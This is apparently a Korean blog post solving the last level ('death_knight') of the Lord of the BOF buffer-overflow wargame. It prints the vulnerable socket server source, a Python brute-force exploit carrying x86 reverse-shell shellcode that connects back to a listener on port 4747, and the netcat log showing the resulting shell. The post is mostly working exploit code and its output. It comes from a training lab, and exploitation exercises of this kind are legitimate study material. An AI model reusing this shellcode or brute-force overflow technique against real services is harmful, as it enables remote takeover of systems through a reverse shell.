5일정도 걸렷네요 쓸데없는거 잘못건드리는바람에..
여튼 드디어 풀엇습니다
[xavius@localhost xavius]$ cat death_knight.c
/*
The Lord of the BOF : The Fellowship of the BOF
- dark knight
- remote BOF
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <dumpcode.h>
main()
{
char buffer[40];
int server_fd, client_fd;
struct sockaddr_in server_addr;
struct sockaddr_in client_addr;
int sin_size;
if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("socket");
exit(1);
}
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(6666);
server_addr.sin_addr.s_addr = INADDR_ANY;
bzero(&(server_addr.sin_zero), 8);
if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){
perror("bind");
exit(1);
}
if(listen(server_fd, 10) == -1){
perror("listen");
exit(1);
}
while(1) {
sin_size = sizeof(struct sockaddr_in);
if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){
perror("accept");
continue;
}
if (!fork()){
send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);
send(client_fd, "You : ", 6, 0);
recv(client_fd, buffer, 256, 0);
close(client_fd);
break;
}
close(client_fd);
while(waitpid(-1,NULL,WNOHANG) > 0);
}
close(server_fd);
}
import socket
buf = ""
buf += "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66"
buf += "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0"
buf += "\xa8\x48\x94\x68\x02\x00\x12\x8b\x89\xe1\xb0\x66\x50"
buf += "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73"
buf += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0"
buf += "\x0b\xcd\x80"
for i in range(255,0,-1):
for j in range(1,256,10):
sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(('192.168.72.143',6666))
payload="a"*44+chr(j)+chr(i)+"\xff\xbf"+"\x90"*(256-48-len(buf))+buf
sock.send(payload)
sock.close()
listening on [any] 4747 ...
192.168.72.143: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.72.148] from (UNKNOWN) [192.168.72.143] 1838
my-pass
euid = 520
got the life
id
uid=0(root) gid=0(root) euid=520(death_knight) egid=520(death_knight)
'과거의 컴퓨터 공부 > LOB(完)' 카테고리의 다른 글
<LOB>完 (0) | 2014.09.03 |
---|---|
(LOB)level19.nightmare (0) | 2014.08.27 |
(LOB)level18.succubus (0) | 2014.08.25 |
(LOB)level17.zombie_assassin (0) | 2014.08.25 |
(LOB)level16.assassin (0) | 2014.08.25 |